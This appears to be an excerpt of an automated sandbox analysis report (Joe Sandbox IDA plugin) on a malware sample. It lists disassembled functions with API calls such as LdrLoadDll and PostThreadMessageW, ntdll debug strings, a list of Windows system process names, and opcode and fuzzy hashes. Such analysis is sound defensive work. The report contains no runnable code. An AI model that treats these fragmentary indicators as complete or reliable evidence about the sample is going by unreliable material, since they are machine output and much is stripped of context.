Instruction Fuzzy Hash: CD90023520151413E111715C8504707001997D0241F95C413E0824558DD6568A52A222

Function 010C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010C2C7A

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 600358b4cd4593ba77800afe7d80ea72b7a045e83e3237ebfaa426247414913b
Instruction ID: 740b2f1bc921d13924461fa47c7379b5b344ed7290895cd18083d1d339512281
Opcode Fuzzy Hash: 600358b4cd4593ba77800afe7d80ea72b7a045e83e3237ebfaa426247414913b
Instruction Fuzzy Hash: FB90023520159802E110715CC40474A001597D0301F59C412E4824658DC69589917222

Function 010C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010C35CA

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8bdaeff705f71d445b30d24f5dc28fc67201ec1f60ec565e044bad67abba9367
Instruction ID: 510a34855ed59ad2da894fcede28a886b3038c54b0ce0beeaaf4a74f38f17945
Opcode Fuzzy Hash: 8bdaeff705f71d445b30d24f5dc28fc67201ec1f60ec565e044bad67abba9367
Instruction Fuzzy Hash: 7290023560561402E100715C8514706101597D0201F65C412E0824568DC7958A5166A3

Function 004145AF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA

Strings

t577G2K6, xrefs: 004146BF, 004146C9, 004146DA
t577G2K6, xrefs: 004146D1, 004146D4

Memory Dump Source

Source File: 00000003.00000002.1882088297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_zAg7xx1vKI.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: t577G2K6$t577G2K6
API String ID: 1836367815-2667467881
Opcode ID: 394e34f50c0a247bce552346e383af64fefe3a966aa8cb87820a7dc397317cf4
Instruction ID: 29e5b59ae817b40a0492b9d9877405cfbecd047df74ef541c8353dda1529c221
Opcode Fuzzy Hash: 394e34f50c0a247bce552346e383af64fefe3a966aa8cb87820a7dc397317cf4
Instruction Fuzzy Hash: 7531C1729062947BCB01DB759C42CDEBBA8EE9339871840AEED449B201D13E8D438BD5

Function 0041464A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA

Strings

t577G2K6, xrefs: 004146BF, 004146C9, 004146DA
t577G2K6, xrefs: 004146D1, 004146D4

Memory Dump Source

Source File: 00000003.00000002.1882088297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_zAg7xx1vKI.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: t577G2K6$t577G2K6
API String ID: 1836367815-2667467881
Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
Instruction ID: 8fda3ae30d1e02e1b48dbe91bdc2a1754cabd6a2c39bac0a93a85bd1a5eab231
Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
Instruction Fuzzy Hash: DD1106B1D4021C7EDB119AE58C81DEFBB7CDF453A8F41407AFA54A7141E2784E068BA5

Function 00414653 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA

Strings

t577G2K6, xrefs: 004146BF, 004146C9, 004146DA
t577G2K6, xrefs: 004146D1, 004146D4

Memory Dump Source

Source File: 00000003.00000002.1882088297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_zAg7xx1vKI.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: t577G2K6$t577G2K6
API String ID: 1836367815-2667467881
Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
Instruction ID: fd813871938eb91e280231b459abbd0e5037b6e28a91437a499ad31076d5f8c8
Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
Instruction Fuzzy Hash: 800104B1D0021C7ADB11AAE58C81DEFBB7CDF45398F408069FA44A7140E17C4E068BA5

Function 00417F0B Relevance: 1.5, APIs: 1, Instructions: 43
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5

Memory Dump Source

Source File: 00000003.00000002.1882088297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_zAg7xx1vKI.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
Instruction ID: cee6ba3a713131cb16669297f14733702e208aa7074b7cb970d80753226a90f1
Opcode Fuzzy Hash: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
Instruction Fuzzy Hash: 7AF02D32E88209CFDB00DF98DC45BD9B3B0FB56719F140ADAEA188B241D36555968B49

Function 0042D143 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041EC3E,?,?,00000000,?,0041EC3E,?,?,?), ref: 0042D17F

Memory Dump Source

Source File: 00000003.00000002.1882088297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_zAg7xx1vKI.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
Instruction ID: 1a0320424f6e2513cda363ed32119c93a96c745f6f302d4d30482123bd46745d
Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
Instruction Fuzzy Hash: F0E06D723042187BC614EE59DC41FDB73ACEFC9710F004419F908A7241CA75BA118BF8

Function 0042D193 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,004176B4,000000F4), ref: 0042D1D2

Memory Dump Source

Source File: 00000003.00000002.1882088297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_zAg7xx1vKI.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
Instruction ID: e28c5f6046658d42be081c83e7545d2ad134910e97977f916db6725ae22c6c78
Opcode Fuzzy Hash: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
Instruction Fuzzy Hash: 19E092723002147BCA10EE5AEC41FEB73ACEFC9710F004019FD08A7241CA78B9118BB8

Function 0042D1E3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,601A316F,?,?,601A316F), ref: 0042D21A

Memory Dump Source

Source File: 00000003.00000002.1882088297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_zAg7xx1vKI.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a25d0429e58c5588c2827f12b5b4e4ce589c6b7f4323042011048058824ffb56
Instruction ID: fa5f5a3ee7dd61a2881b8e9e18f2c3305c63e6423d1f29c247da1a030937b839
Opcode Fuzzy Hash: a25d0429e58c5588c2827f12b5b4e4ce589c6b7f4323042011048058824ffb56
Instruction Fuzzy Hash: 5FE04F762402147BC510EB5ADC01F97775CEFC5755F508419FA0967142CB75BA11C7B4

Function 010C2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 010C2C24

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 80ae76f0435d3946796b2fa286f217d9b0c9ca3112f64b5d358d6c665a3ad3f8
Instruction ID: ae3ab1fd66be5613d839faeca7cf93f8b18163841a34fc5aa7a8d6639754f940
Opcode Fuzzy Hash: 80ae76f0435d3946796b2fa286f217d9b0c9ca3112f64b5d358d6c665a3ad3f8
Instruction Fuzzy Hash: 39B09B719015D5C5EA51E764860871F795077D0701F15C066D2430681F4738C1D1E676

Non-executed Functions

Function 01138D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE

Download Yara Rule

Strings

The resource is owned exclusively by thread %p, xrefs: 01138E24
This failed because of error %Ix., xrefs: 01138EF6
*** enter .exr %p for the exception record, xrefs: 01138FA1
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01138F26
*** An Access Violation occurred in %ws:%s, xrefs: 01138F3F
*** A stack buffer overrun occurred in %ws:%s, xrefs: 01138DA3
read from, xrefs: 01138F5D, 01138F62
The resource is owned shared by %d threads, xrefs: 01138E2E
an invalid address, %p, xrefs: 01138F7F
Go determine why that thread has not released the critical section., xrefs: 01138E75
write to, xrefs: 01138F56
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01138FEF
*** Inpage error in %ws:%s, xrefs: 01138EC8
The critical section is owned by thread %p., xrefs: 01138E69
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01138E86
*** then kb to get the faulting stack, xrefs: 01138FCC
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01138D8C
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01138F2D
*** Resource timeout (%p) in %ws:%s, xrefs: 01138E02
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01138E3F
The instruction at %p tried to %s , xrefs: 01138F66
The instruction at %p referenced memory at %p., xrefs: 01138EE2
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01138DD3
*** enter .cxr %p for the context, xrefs: 01138FBD
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01138DC4
<unknown>, xrefs: 01138D2E, 01138D81, 01138E00, 01138E49, 01138EC7, 01138F3E
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 01138E4B
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01138DB5
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01138F34
a NULL pointer, xrefs: 01138F90

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 5503604774d4120439bb0147d9c5ac3e9fd6d2a2da7fe1e65e14064eb09d8d3c
Instruction ID: 0566385247d4e3476c885ce656ba90e27aa1f095aa419307539772a76c94d916
Opcode Fuzzy Hash: 5503604774d4120439bb0147d9c5ac3e9fd6d2a2da7fe1e65e14064eb09d8d3c
Instruction Fuzzy Hash: A0812575E04215BFEB2EAB19DC46D7B3F39EF96B54F010158F2086F256E3B18802D662

Function 01102349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

GlobalFlag, xrefs: 01102F3F, 01103059
CFGOptions, xrefs: 01102967
minkernel\ntdll\ldrinit.c, xrefs: 01103187
@, xrefs: 01102B74
MinimumStackCommitInBytes, xrefs: 01102BB0
MaxDeadActivationContexts, xrefs: 01102D82
MaxLoaderThreads, xrefs: 011024EC
TracingFlags, xrefs: 01102549
DisableHeapLookaside, xrefs: 0110246D
RaiseExceptionOnPossibleDeadlock, xrefs: 01102579
FrontEndHeapDebugOptions, xrefs: 01102489
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01103176
DisableExceptionChainValidation, xrefs: 0110275F
@, xrefs: 01102942
UnloadEventTraceDepth, xrefs: 011024C0
LdrpInitializeExecutionOptions, xrefs: 0110317D
ExecuteOptions, xrefs: 011025A0
UseImpersonatedDeviceMap, xrefs: 0110251C
ShutdownFlags, xrefs: 011024A1
GlobalFlag2, xrefs: 01102FC0

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 17df6db8d0fe3216280e819ce5e96fc152c37532b864cb1495cae378475d0124
Instruction ID: c77e0dfccfafb32eb9b63c236c0e26d5960a31b87dd57a11026ca82eafeca47e
Opcode Fuzzy Hash: 17df6db8d0fe3216280e819ce5e96fc152c37532b864cb1495cae378475d0124
Instruction Fuzzy Hash: A5929371A047429FE72ADF14C884FABB7E8BB84754F04492DFA95D7290D7B0D844CB92

Function 010B8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

undeleted critical section in freed memory, xrefs: 010F542B
Critical section address., xrefs: 010F5502
Critical section debug info address, xrefs: 010F541F, 010F552E
corrupted critical section, xrefs: 010F54C2
double initialized or corrupted critical section, xrefs: 010F5508
8, xrefs: 010F52E3
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010F54E2
Thread is in a state in which it cannot own a critical section, xrefs: 010F5543
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010F54CE
Address of the debug info found in the active list., xrefs: 010F54AE, 010F54FA
Thread identifier, xrefs: 010F553A
Invalid debug info address of this critical section, xrefs: 010F54B6
Critical section address, xrefs: 010F5425, 010F54BC, 010F5534
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010F540A, 010F5496, 010F5519

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 64133d5afe229f58a90e4bce5767fc890f7927b12f22d10389645a74c0dc036d
Instruction ID: ab1b0996d6724857b89d7bfc08a15ecd0b5f4564edc1e0f1835f2d6a5c31ecfe
Opcode Fuzzy Hash: 64133d5afe229f58a90e4bce5767fc890f7927b12f22d10389645a74c0dc036d
Instruction Fuzzy Hash: 80818AB1A00358EFDB64CF99CC45BAEBBF9AB08B04F10815EF684BB650D771A940CB50

Function 010B29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 010F2624
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010F25EB
@, xrefs: 010F259B
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 010F2498
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 010F2412
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 010F2409
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 010F2506
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010F22E4
RtlpResolveAssemblyStorageMapEntry, xrefs: 010F261F
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 010F2602
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010F24C0

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 4c7930b21970797df01ed444c718ffc4aa3a733924bff07c8626ce9138ef1404
Instruction ID: bf04e3af72d7e40cbe986e231bd80f79371a469778304ce23eb9eea230c7f162
Opcode Fuzzy Hash: 4c7930b21970797df01ed444c718ffc4aa3a733924bff07c8626ce9138ef1404
Instruction Fuzzy Hash: 83026EF1D002299BDB71DB54CC81BDEB7B8AB54704F4041EAA789A7241EB70AE84CF59

Function 01128B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

services.exe, xrefs: 01128B96
lsass.exe, xrefs: 01128BA1
heapType, xrefs: 01128BCB
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01128BD0
SegmentHeap, xrefs: 01128BE9
DefaultBrowser_NOPUBLISHERID, xrefs: 01128D00
runtimeuserer.exe, xrefs: 01128B73
svchost.exe, xrefs: 01128B68
csrss.exe, xrefs: 01128B80
smss.exe, xrefs: 01128B8B

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 3f2d02a8a7f78a3348f7e5a0dcb104897523417290934ebb92bf4825da69d60e
Instruction ID: 3b3ae56b2171c6d05dc4b54410748bdcfcfaa77937d406f97149fda41c655773
Opcode Fuzzy Hash: 3f2d02a8a7f78a3348f7e5a0dcb104897523417290934ebb92bf4825da69d60e
Instruction Fuzzy Hash: E351CD715083269BC32DDF18C884BEBBBE8FF94650F54492DE999C7241E770D628CB92

Function 0109AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

LdrGetDllHandleEx, xrefs: 010E807C, 010E83B2
Status: 0x%08lx, xrefs: 010E82D0, 010E83AB
minkernel\ntdll\ldrapi.c, xrefs: 010E8086, 010E83BC
LdrpInitializeDllPath, xrefs: 010E80AD
minkernel\ntdll\ldrutil.c, xrefs: 010E80B7
DLL name: %wZ, xrefs: 010E8075
LdrpFindLoadedDllInternal, xrefs: 010E82D7
DLL search path passed in externally: %ws, xrefs: 010E80A6
minkernel\ntdll\ldrfind.c, xrefs: 010E82E1

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: 81eb1f639a3206932be304a648ad9cdd219f9f67f9e8446aff989c89274d4493
Instruction ID: ba0898b7816325aa2b9107f6c3e9708e226ca66c5f641e22f38a5ff3bdb9ce33
Opcode Fuzzy Hash: 81eb1f639a3206932be304a648ad9cdd219f9f67f9e8446aff989c89274d4493
Instruction Fuzzy Hash: 3112F071A08342CFDB64DF28C464BAABBE4BF84714F04456EF9C58B291E734D944DB92

Function 01130274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 011303A6, 011304B5, 011305DD, 01130682, 011306D9
RtlReAllocateHeap, xrefs: 011302BF, 01130362
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 011306EA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0113069F
About to reallocate block at %p to %Ix bytes, xrefs: 011303BA
HEAP[%wZ]: , xrefs: 01130399, 011304A8, 011305D0, 01130675, 011306CC
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 011304D3
Just reallocated block at %p to %Ix bytes, xrefs: 011305F1

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 426673d73ff164796f010bbbf9cd45749e94c55794032508f11b24c8e2d93e65
Instruction ID: 494d5db2ffc24d4e2d7a81991c1df92dd9c0bb7714e893555f7f091897574f1f
Opcode Fuzzy Hash: 426673d73ff164796f010bbbf9cd45749e94c55794032508f11b24c8e2d93e65
Instruction Fuzzy Hash: 6ED1EF31A00686DFDB2ADF68C840AAEFBF1FF8A710F198059F4959B656C7349981CB14

Function 011089B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierDlls, xrefs: 01108CBD
AVRF: -*- final list of providers -*- , xrefs: 01108B8F
VerifierFlags, xrefs: 01108C50
VerifierDebug, xrefs: 01108CA5
HandleTraces, xrefs: 01108C8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01108A3D
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01108A67

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 7e4ff79b69a41672371d85402e4d2234c0d1c160875ebb9c14be3d703d93d81d
Instruction ID: c0392e375d879ddb10ba7c11b5f38d988397c61c1101779f7456da48fa395622
Opcode Fuzzy Hash: 7e4ff79b69a41672371d85402e4d2234c0d1c160875ebb9c14be3d703d93d81d
Instruction Fuzzy Hash: 0E915771E08716EFD72FEF288880B9A7BB5AB54714F054528FA85AB3C1C7B09C41CB91

Function 0108EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

, xrefs: 0108F299
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0108EB6C
R, xrefs: 0108EB62
{, xrefs: 010E4643
LdrpResSearchResourceInsideDirectory Enter, xrefs: 0108EB58
T, xrefs: 0108EB4E

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 4ee58d7c493940c46bdbba0c34cff8eb5f35e55cd2b8af5bbe99cfc9c90ca3e8
Instruction ID: 685195467688fafe1d2c6cfe56e4c693bb71a8d3b774814fb51a606a53d52691
Opcode Fuzzy Hash: 4ee58d7c493940c46bdbba0c34cff8eb5f35e55cd2b8af5bbe99cfc9c90ca3e8
Instruction Fuzzy Hash: 15A23A74A0962A8FDB64EF29C8887ADBBF5BF45304F1442E9D589E7250DB309E85CF40

Function 010B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 010F413A
_LdrpInitialize, xrefs: 010F40DF, 010F4141, 010F4205, 010F425F
minkernel\ntdll\ldrinit.c, xrefs: 010F40E9, 010F414B, 010F420F, 010F4269
Delaying execution failed with status 0x%08lx, xrefs: 010F4258
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 010F40D8
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 010F41FE

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 18c8afd99b66da78cf2f6ae515f63706ff27f782dbb93bec4c67e1d16df85dcf
Instruction ID: feb53cec4fa3473b9beca9dadda0cf3fdb00662887f157bc39afcd49c63d61ef
